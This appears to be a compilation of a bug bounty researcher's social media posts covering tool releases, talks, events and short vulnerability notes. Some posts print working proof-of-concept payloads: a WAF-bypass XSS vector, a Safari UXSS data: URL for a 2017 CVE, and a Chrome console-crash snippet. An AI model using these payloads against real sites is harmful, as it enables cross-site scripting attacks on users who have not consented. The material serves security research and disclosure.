Took more than 2 years, but just released the postMessage-tracker Chrome Extension!
Look at the functions receiving postMessages directly in the extension, look at the messages and sender/receiver window locations and track everything using a log-URL.
I decided to make a homage-post to
@homakov
and
@Nirgoldshlager
about different OAuth-token leakage methods I've been researching – ten years after their blog posts that inspired me to start hunt for bugs ♥️ thank you.
I found some permission issues when hacking Apple CloudKit. I wrote about three of them
@detectify
labs, one where I accidentally deleted all shared Apple Shortcuts.
Akamai WAF bypass XSS in HTML-context when no character-filtering exists to trick it:
<style>
@keyframes
a{}b{animation:a;}</style><b/onanimationstart=prompt`${document.domain}&
#x60
;>
If you're testing a site that needs a unique CSRF-token for each call, you can use Hackvertor's custom tags to make a simple python script to fetch a new token for you. Very simple solution and works very nicely. Thank you again
@garethheyes
!
Here are my slides from my talk at the Facebook/Google-hosted BountyCon 2019 in Singapore earlier this year:
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
Ten years ago today I sent my first bug bounty report. It was to PayPal. Fascinating to see some things are very different now from then, but some things are still exactly like they were.
I have researched Oblivious DoH (ODoH) a bit and came to a few conclusions around the lack of security concerns for SSRF in the RFC. I was asked to also make a public issue about it after reporting issues in odoh-server-go made by Cloudflare.
I often export proxy items from Burp to extract certain data. Example: filter out all response headers where request param is X, get a list of all response params for custom wordlist creation etc. I built this tool to make it do what I want:
I wrote a simple reflection script which helps a lot to find script gadgets (
@kkotowicz
@slekies
@sirdarckcat
) for XSS. There are probably more advanced solutions but it makes it a lot easier to go through large amounts of js-files to find candidates.
I can't believe it! I won the H1-514 in Montreal! But from Stockholm. During the announcements I was jumping frozen and cold on a parking lot at 3 AM screaming. It felt like I was there, and it seems I kind of was also, thanks to
@jobertabma
😂
THANK YOU FOR THIS! ❤️❤️❤️
#h1514
I read the S3-docs and found that signing-errors disclosed the bucket-name. This can be used when CDNs are put in front of a bucket. It doesn't work in all cases, but many of them. You need an access-key to make it work (no secret-key)
S3 decloaker:
Safari 10 UXSS (CVE-2017-7089) found by me and
@i_bo0om
last year:
data:text/html,<script>function y(){x=open('parent-tab://google.com','_top'),x.document.body.innerHTML='<img/src=""onerror="alert(document.domain)">'};setTimeout(y,100)</script>
One of my "client-side race condition"-bugs finally got disclosed. I'm racing by sending postmessages faster than the legit sender and by opening a new window instead of a tab, I can keep the opener window send the messages much faster.
Turns out my Smart TV was really into CORS. It was possible to bruteforce the PIN remotely in under 2 mins using a race condition, after that you have full control using IRCC et al.
Here's an XSS-challenge taken from real life. Can you make it alert() on my origin? Send me your solution in DM. I will post a hint in this thread after the weekend.
#xss
#bugbounty
An easy and quick tool to search through a git repo's all branches and commits or through a GitHub user's all repos with a regex, written by
@peterjaric
"There is no reason to do bug bounties. All bugs are already found and the competition is too hard"
– said someone that should watch me and
@avlidienbrunn
speak at OWASP Stockholm the 2nd of October – "Eliminating False Assumptions in Bug Bounties"
If you ever wanted a video about live hacking including
@JonathanBouman
smashing a sign saying NO HACKERS ALLOWED, a shuffling
@avlidienbrunn
and me roaring as a lion, today all your wishes came true:
Thank you
@Hacker0x01
@awscloud
for an amazing event♥️
A huge amount of sites are doing this wrong still and this is such a beautiful attack. Often leads to account takeover due to CSRF-token leakage. Great job again
@omer_gil
!
I will be doing the keynote on the first
@bsidesahmedabad
ever in a few minutes! Super thankful for being invited, I hope you will enjoy!
#bsidesahmedabad
Hacking into Google's Network for $133,337 🏆
It was a pleasure to talk to
@epereiralopez
about his bug bounty research into Google Cloud. It was really fascinating to hear about the Google internals and crazy tricks he knew.
Here's an XSS-challenge taken from real life. Can you make it alert() on my origin? Send me your solution in DM. I will post a hint in this thread after the weekend.
#xss
#bugbounty
Electrum 3.0.4 is still vulnerable to some extent, since it allows blind posting of commands using text/plain.
@taviso
mentioned gui-command, I did an ugly PoC of it. Safari allows you to find ports which gives errors but are still open. Wait until proper patch is out.
I made a CLI-version of the Template Generator, called bountytpl:
markdown-file + JSON = report
Can be used nicely in a pipeline with bountyplz:
#bugbounty
This is neat! Chrome fetches CSS
@imports
before the full document is received and by abusing output buffers you can import multiple CSS in the same response based on the previous import and do sequential extracting for HTML-attributes. Great writeup!
In Chrome, run:
data:text/html,<script>Object.getPrototypeOf=function(){return {constructor:{}}}</script>
Type anything in the console after that, the suggestion-tooltip will run into an infinite recursion.
#sundayfunday
Such an AWESOME event in Amsterdam. I love hanging out with all the people, talking, sharing ideas, collaborate. Congrats
@MrTuxracer
for the MVH, well deserved! And THANK YOU
@Dropbox
for being such a great and fun target, you did not make it easy for us :D
Karaoke-time!
#h13120
On my way to
#h1702
in Vegas, representing Team Sweden 🇸🇪!
Also, thanks
@securinti
for rooting for us even back in 2015 (check the first link below). 😘
HOW TO GET STARTED IN BUG BOUNTY (9+pro tips)
A week ago i asked the bounty community for their top 3 best tips on how to get started. This is the result. Thanks everyone who contributed and your awesome support! <3
Such a small little detail in the UX. It never gets any credit, but it's a great solution when scrolling through large amount of items not wanting to filter, but still want to find things. I will now finally give it the recognition it deserves. Thank you
@Burp_Suite